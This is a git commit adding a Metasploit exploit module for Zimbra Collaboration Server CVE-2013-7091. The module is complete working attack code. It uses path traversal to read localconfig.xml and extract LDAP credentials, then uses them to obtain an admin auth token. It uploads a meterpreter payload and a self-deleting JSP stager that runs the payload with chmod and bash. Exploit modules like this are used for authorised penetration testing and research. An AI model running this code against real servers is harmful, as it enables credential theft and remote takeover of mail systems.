added module for Zimbra Collaboration Server CVE-2013-7091

Mekanismen · Mekanismen · commit 2de15bdc8bd2 · 2013-12-17T19:32:04.000+01:00
diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb
@@ -0,0 +1,234 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'uri'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  Rank = GreatRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Zimbra Collaboration Server LFI',
+      'Description'     => %q{
+      A Local file inclusion exists in versions 8.0.2, 7.2.2 and possibly other versions which allows an attacker to get the LDAP
+      credentials from the localconfig.xml file. The stolen credentials enables the attacker to make requests to the service/admin/soap API. This can then be used
+      to create an authentication token for the admin web interface where an administrative user can be added or code execution could be leveraged.
+      Tested on Zimbra Collaboration Server 8.0.2 with Ubuntu Server 12.04.
+      },
+      'Author'          =>
+        [
+          'rubina119', # Vulnerability discovery
+          'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ "CVE", "2013-7091" ],
+          [ "EDB", "30085" ],
+          [ 'URL', "http://cxsecurity.com/issue/WLB-2013120097" ]
+        ],
+      'Privileged'      => false,
+      'Platform'        => ['linux'],
+      'Targets'         =>
+        [
+         [ 'Linux',
+            {
+            'Arch'      => ARCH_X86,
+            'Platform'  => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => "Dec 06 2013"
+    ))
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 7071])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('SSL', [ true, 'Negotiate SSL for outgoing connections', true]),
+        OptString.new('ALTDIR', [ false, 'Alternative zimbraAdmin directory', "zimbraAdmin"])
+      ])
+  end
+
+  def check
+    uri = target_uri.path
+    turl = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
+    #doesnt want to play nice if used with vars_get
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, datastore['ALTDIR'], turl),
+      'method' => 'GET',
+    })
+
+    unless res and res.code == 200
+      return Exploit::CheckCode::Safe
+    end
+
+    #this response is ~100% gzipped
+    begin
+      text =  Rex::Text.ungzip(res.body)
+    rescue Zlib::GzipFile::Error
+      text = res.body
+    end
+
+    if text =~ /name=\\"zimbra_user\\">";\sa\["<value>(.*)<\/value>/
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    uri = target_uri.path
+    turl = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
+    #doesnt want to play nice if used with vars_get
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, datastore['ALTDIR'], turl),
+      'method' => 'GET'
+    })
+
+    unless res and res.code == 200
+      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
+    end
+
+    print_status("#{peer} - Getting login credentials...")
+    #this response is ~100% gzipped
+    begin
+      text =  Rex::Text.ungzip(res.body)
+    rescue Zlib::GzipFile::Error
+      text = res.body
+    end
+
+    if text =~ /name=\\"zimbra_user\\">";\sa\["<value>(.*)<\/value>/
+      zimbra_user = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials")
+    end
+
+    if text =~ /name=\\"zimbra_ldap_password\\">";\sa\["<value>(.*)<\/value>/
+      zimbra_pass = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials")
+    end
+
+    print_good("#{peer} - Got login credentials!")
+    print_status("#{peer} - Getting auth token...")
+
+    soap_req =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+    soap_req << "<env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/>"
+    soap_req << "</env:Header><env:Body><ns1:AuthRequest><account by=\"name\">#{zimbra_user}</account><password>#{zimbra_pass}</password></ns1:AuthRequest></env:Body></env:Envelope>"
+
+    res = send_request_cgi({
+      'uri'             => normalize_uri(uri, "/service/admin/soap"),
+      'method'          => 'POST',
+      'ctype'           => 'application/soap+xml; charset="utf-8"',
+      'headers'         =>
+        {
+          'SOAPAction'  => '"urn:zimbraAdmin#AuthRequest"',
+        },
+      'data'            => soap_req
+    })
+
+    unless res and res.code == 200
+      fail_with(Failure::Unknown, "#{peer} - Unable to access service URL")
+    end
+
+    if res.body =~ /<authToken>(.*)<\/authToken>/
+      auth_token = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Unable to get auth token")
+    end
+
+    cookie =  "ZM_ADMIN_AUTH_TOKEN=#{auth_token}"
+    print_good("#{peer} - Got auth token!")
+
+    #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler
+    #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/
+    #the intent is for a ZCO file, whatever that is. However any file will do and it's placed in /downloads/ which we can reach, how handy!
+
+    #push our meterpreter and then a stager jsp file that sets correct permissions, executes the meterpreter and removes itself afterwards
+    payload_name = rand_text_alpha(8+rand(8))
+    stager_name = rand_text_alpha(8+rand(8)) + ".jsp"
+    req_id = rand_text_numeric(2).to_s
+
+    stager = gen_stager(payload_name)
+    dpayload = generate_payload_exe
+
+    #upload payload
+
+    print_status("#{peer} - Uploading .JSP stager and payload")
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("#{payload_name}", nil, nil, "form-data; name=\"filename1\"")
+    post_data.add_part("#{dpayload}", "application/octet-stream", nil, "form-data; name=\"clientFile\"; filename=\"#{payload_name}\"")
+    post_data.add_part("#{req_id}", nil, nil, "form-data; name=\"requestId\"")
+
+    n_data = post_data.to_s
+    n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+    res = send_request_cgi({
+      'uri'             => normalize_uri(uri, "/service/extension/clientUploader/upload/"),
+      'method'          => 'POST',
+      'ctype'           => 'multipart/form-data; boundary=' + post_data.bound,
+      'data'            => n_data,
+      'cookie'          => cookie
+    })
+
+    unless res and res.code == 200
+      fail_with(Failure::Unknown, "#{peer} - Unable to get upload payload")
+    end
+
+    #upload jsp stager
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("#{stager_name}", nil, nil, "form-data; name=\"filename1\"")
+    post_data.add_part("#{stager}", "application/octet-stream", nil, "form-data; name=\"clientFile\"; filename=\"#{stager_name}\"")
+    post_data.add_part("#{req_id}", nil, nil, "form-data; name=\"requestId\"")
+
+    n_data = post_data.to_s
+    n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+    res = send_request_cgi({
+      'uri'             => normalize_uri(uri, "/service/extension/clientUploader/upload/"),
+      'method'          => 'POST',
+      'ctype'           => 'multipart/form-data; boundary=' + post_data.bound,
+      'data'            => n_data,
+      'cookie'          => cookie
+    })
+
+    unless res and res.code == 200
+      fail_with(Failure::Unknown, "#{peer} - Unable to upload stager")
+    end
+
+    print_good("#{peer} - Stager and payload uploaded!")
+    print_status("#{peer} - Stager at #{peer}/downloads/#{stager_name}")
+    print_status("#{peer} - Executing payload!")
+
+    res = send_request_cgi({
+      'uri'             => normalize_uri(uri, "downloads", stager_name),
+      'method'          => 'GET',
+    })
+  end
+
+  def gen_stager(payload_name)
+    stager  = "<%@ page import=\"java.util.*,java.io.*\"%>"
+    stager += " <%"
+    stager += " String uri = request.getRequestURI();"
+    stager += " String filename = uri.substring(uri.lastIndexOf(\"/\")+1);"
+    stager += " String jspfile = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/\" + filename;"
+    stager += " String payload = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/#{payload_name}\";"
+    stager += " Runtime.getRuntime().exec(\"chmod 700 \" + payload);"
+    stager += " Runtime.getRuntime().exec(\"bash -c '\" + payload + \"'\");"
+    stager += " Runtime.getRuntime().exec(\"rm \" + jspfile);"
+    stager += "%>"
+    return stager
+  end
+end
